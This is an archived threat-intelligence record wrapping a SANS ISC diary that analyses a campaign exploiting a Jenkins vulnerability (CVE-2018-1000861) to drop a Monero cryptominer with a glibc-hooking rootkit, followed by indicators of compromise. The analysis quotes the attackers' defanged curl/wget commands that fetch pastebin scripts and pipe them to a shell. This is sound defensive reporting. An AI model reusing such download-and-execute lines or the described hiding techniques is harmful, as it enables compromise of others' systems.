{
	"id": "5bca75f8-d965-409a-ad3e-fbd61125bf1e",
	"created_at": "2026-04-06T00:19:05.69763Z",
	"updated_at": "2026-04-10T03:20:22.689412Z",
	"deleted_at": null,
	"sha1_hash": "ea884579ea655fbf0fbf7484c51ddb8aeb944e46",
	"title": "Vulnerable Apache Jenkins exploited in the wild - SANS ISC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1319166,
	"plain_text": "Vulnerable Apache Jenkins exploited in the wild - SANS ISC\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 21:27:10 UTC\r\nAn ongoing malicious campaign is looking for vulnerable Apache Jenkins installations to deploy a Monero\r\ncryptominer. The dropper uses sophisticated techniques to hide its presence on the system, to move laterally and to\r\nlook for new victims on the internet. It also downloads and runs the miner software – of course.\r\nThe exploited vulnerability, CVE-2018-1000861 [1], was published in December 2018. It affects Stapler Web\r\nframework used by Jenkins 2.153 and earlier. It may allow attackers to invoke methods on Java objects by\r\naccessing crafted URLs.\r\nLooking for publicly available exploits for this vulnerability, I could find a detailed proof of concept published\r\nearly March this year.\r\nAfter analyzing the threat which attacked one of my honeypots, I created the diagram shown in the picture below.\r\nFollow the numbers in blue to understand each step.\r\nhttps://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916\r\nPage 1 of 6\n\nVulnerability Exploitation\r\nIn the picture below, you can see the exploitation occurring. \r\nNotice that there is a base64 encoded content piped to bash for execution. Decoding this content, it was possible to\r\nsee that this campaign is using Pastebin as the C2:\r\n(curl -fsSL hxxps://pastebin[.]com/raw/wDBa7jCQ||wget -q -O- hxxps://pastebin[.]com/raw/wDBa7jCQ)|sh\r\nThe content of the paste ‘wDBa7jCQ’ is no longer available, but the content was another paste:\r\n(curl -fsSL hxxps://pastebin[.]com/raw/D8E71JBJ||wget -q -O- hxxps://pastebin[.]com/raw/D8E71JBJ)|sed\r\n's/\\r//'|sh\r\nhttps://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916\r\nPage 2 of 6\n\nThe content of ‘D8E71JBJ’ paste is no longer available also, but it was the shell script down in following images.\r\nThe Dropper\r\nThe dropper named “Kerberods” (not “Kerberos” as the protocol) caught my attention due to the way it is packed\r\nand the way it acts if it has ‘root’ privileges on the machine.\r\nAfter analyzing the binary, I could see that the packer used was a custom version of ‘UPX’. UPX is an open\r\nsource software and there are many ways UPX can be modified to make it hard to unpack the file using regular\r\nUPX version. There is a great presentation on this subject by @unixfreaxjp [2] called ‘Unpacking the non-unpackable’ which shows different forms to fix ELF headers in order to unpack files.\r\nhttps://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916\r\nPage 3 of 6\n\nFortunately, in this case, the UPX customizations involved just the modification of the magic constant\r\nUPX_MAGIC_LE32 from 'UPX' to some other three letters. Thus, reverting it to UPX in different parts of the\r\nbinary, it was possible to unpack the binary with the regular version of UPX.\r\nThe Glibc hooks\r\nThe other interesting part is the way ‘Kerberods’ acts to persist and hide itself if has root privileges on the\r\nmachine.\r\nIf it is the case, it drops, compiles and loads a library into the operating system that hooks different functions of\r\nGlibc to modify its behavior. In other words, it acts like a rootkit.\r\nIn the image below it is possible to see that the function ‘open’ will now check for some strings in the ‘pathname’\r\nto act in a different way. The intention is to avoid anyone (including root) to be able to open the binary\r\n‘khugepageds’, which is the cryptominer, the ‘ld.so.preload’, which is the file that loads the malicious library and\r\nthe library ‘libpamcd.so’ itself.\r\nhttps://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916\r\nPage 4 of 6\n\nAnother hook, to show one more example, hides the network connection to the private mining pool and the scan\r\nfor open Redis servers, as seen in the image below.\r\nIndicators of Compromise (IOCs)\r\nFilesystem\r\n74becf0d1621ba1f036025cddffc46d4236530d54d1f913a4d0ad488099913c8\r\nBab27f611518dc55b00b1a9287bdb8e059c4f4cc1607444f40e0c45d5842994f\r\n43a00e0dd57d110d1c88b18234185267ca2a79f8ae1905bef4ba225144c992d2\r\n \r\nNetwork\r\nSYSTEMTEN[.]ORG:51640\r\n \r\n--\r\nRenato Marinho\r\nMorphus Labs| LinkedIn|Twitter\r\nhttps://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916\r\nPage 5 of 6\n\nSource: https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916\r\nhttps://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916"
	],
	"report_names": [
		"24916"
	],
	"threat_actors": [],
	"ts_created_at": 1775434745,
	"ts_updated_at": 1775791222,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ea884579ea655fbf0fbf7484c51ddb8aeb944e46.pdf",
		"text": "https://archive.orkl.eu/ea884579ea655fbf0fbf7484c51ddb8aeb944e46.txt",
		"img": "https://archive.orkl.eu/ea884579ea655fbf0fbf7484c51ddb8aeb944e46.jpg"
	}
}